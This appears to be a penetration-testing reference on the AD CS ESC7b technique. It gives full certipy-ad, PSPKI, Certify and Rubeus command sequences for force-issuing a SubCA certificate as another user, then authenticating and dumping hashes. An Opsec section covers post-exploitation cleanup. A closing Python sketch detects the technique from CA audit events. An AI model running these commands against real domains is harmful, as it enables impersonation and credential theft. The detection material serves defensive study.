ADCSESC7b

ESC7b: the ManageCertificates (CA Officer) right allows approving pending or failed certificate requests, enabling issuance of arbitrary certificates: first request a certificate via the SubCA template (the request is denied), then force-issue that request as an officer.

Applies to: Principals with the ManageCertificates (Officer) right → Enterprise CA

Linux Abuse

certipy-ad (SubCA template attack)

# Step 1: Enumerate CA rights
certipy-ad find -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> -vulnerable -stdout

# Step 2: Add self as officer (only if ManageCA is also held; skip if already an officer)
certipy-ad ca -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -add-officer <username>

# Step 3: Enable the SubCA template on the CA
certipy-ad ca -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -enable-template SubCA

# Step 4: Request cert via SubCA; this will be DENIED (manager approval required)
certipy-ad req -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -target <ca-host> -template SubCA \
  -upn <target-user>@<domain>
# Note the request ID from the output (e.g., Request ID: 785)

# Step 5: As officer, force-issue the denied request
certipy-ad ca -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -issue-request <request-id>

# Step 6: Retrieve the now-issued certificate
certipy-ad req -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -target <ca-host> -retrieve <request-id>
# Output: <target-user>.pfx

# Step 7: Authenticate
certipy-ad auth -pfx <target-user>.pfx -dc-ip <dc-ip>

# Step 8: PTH
secretsdump.py -hashes ':<ntlm-hash>' '<domain>/<target-user>@<dc-ip>'

Windows Abuse

PSPKI module (approve pending request)

Import-Module PSPKI

# Request via SubCA template (will be denied; note the request ID)
Certify.exe request /ca:<ca-host>\<ca> /template:SubCA /upn:<target-user>@<domain>

# List pending requests
Get-CertificationAuthority -ComputerName <ca-host> | Get-PendingRequest

# Approve specific request by ID
Get-CertificationAuthority -ComputerName <ca-host> | `
  Get-PendingRequest -RequestID <request-id> | `
  Approve-CertificateRequest

# After approval, retrieve cert
Certify.exe download /ca:<ca-host>\<ca> /id:<request-id>

# TGT
Rubeus.exe asktgt /user:<target-user> /domain:<domain> /certificate:<pfx-base64> /ptt

Opsec

  • Approving certificate requests generates CA audit events (Event ID 4887).
  • Enabling the SubCA template is logged as a CA configuration change.
  • The issued certificate persists in the CA's Issued Certificates store.
  • Disable the SubCA template and revoke the certificate post-exploitation.
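The Opsec points above describe the trail this technique leaves on the CA: a denied request (Event ID 4888) for the same Request ID that is later approved and issued (Event ID 4887), typically against the SubCA template. The following detection sketch is an added example, not code from the original page or from any tool it mentions; it correlates constructed sample events in a simplified schema of this example's own (the real Windows Security log events carry more fields under different names, so the field mapping is an assumption to adapt to your log pipeline).

```python
from datetime import datetime, timedelta

# Constructed sample of CA audit events. Field names are this example's own
# simplification, not the Windows Security log schema. Request 785 models the
# ESC7b flow from the page: denied SubCA request, then force-issued minutes later.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:02", "event_id": 4888, "request_id": 785,
     "requester": "CORP\\lowpriv", "attributes": "CertificateTemplate:SubCA"},
    {"time": "2024-05-01T10:03:15", "event_id": 4887, "request_id": 785,
     "requester": "CORP\\lowpriv", "attributes": "CertificateTemplate:SubCA"},
    {"time": "2024-05-01T11:00:00", "event_id": 4887, "request_id": 790,
     "requester": "CORP\\ws01$", "attributes": "CertificateTemplate:Machine"},
    {"time": "2024-05-01T12:00:00", "event_id": 4888, "request_id": 791,
     "requester": "CORP\\alice", "attributes": "CertificateTemplate:User"},
]

# Templates whose issuance should always be reviewed (SubCA yields a CA cert).
WATCHED_TEMPLATES = {"SubCA"}


def parse_attributes(attributes: str) -> dict:
    """Split 'Key:Value' request attributes (one pair per line) into a dict."""
    parsed = {}
    for line in attributes.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            parsed[key.strip()] = value.strip()
    return parsed


def find_esc7b_candidates(events, window=timedelta(hours=24)):
    """Return (kind, request_id, requester, template) findings.

    kind is 'denied_then_issued' when a 4887 issuance follows a 4888 denial
    for the same Request ID within `window`, and 'watched_template_issued'
    when a 4887 issuance names a template in WATCHED_TEMPLATES.
    """
    findings = []
    denied_at = {}  # request_id -> timestamp of the denial event
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        rid = ev["request_id"]
        template = parse_attributes(ev["attributes"]).get("CertificateTemplate", "")
        if ev["event_id"] == 4888:
            denied_at[rid] = ts
        elif ev["event_id"] == 4887:
            if rid in denied_at and ts - denied_at[rid] <= window:
                findings.append(("denied_then_issued", rid, ev["requester"], template))
            if template in WATCHED_TEMPLATES:
                findings.append(("watched_template_issued", rid, ev["requester"], template))
    return findings


if __name__ == "__main__":
    for finding in find_esc7b_candidates(SAMPLE_EVENTS):
        print(finding)
```

Both rules fire on request 785 and neither on the routine Machine-template issuance or the lone denial, which is the signal to pair with the CA configuration-change events noted above (template enabled, officer added) when triaging.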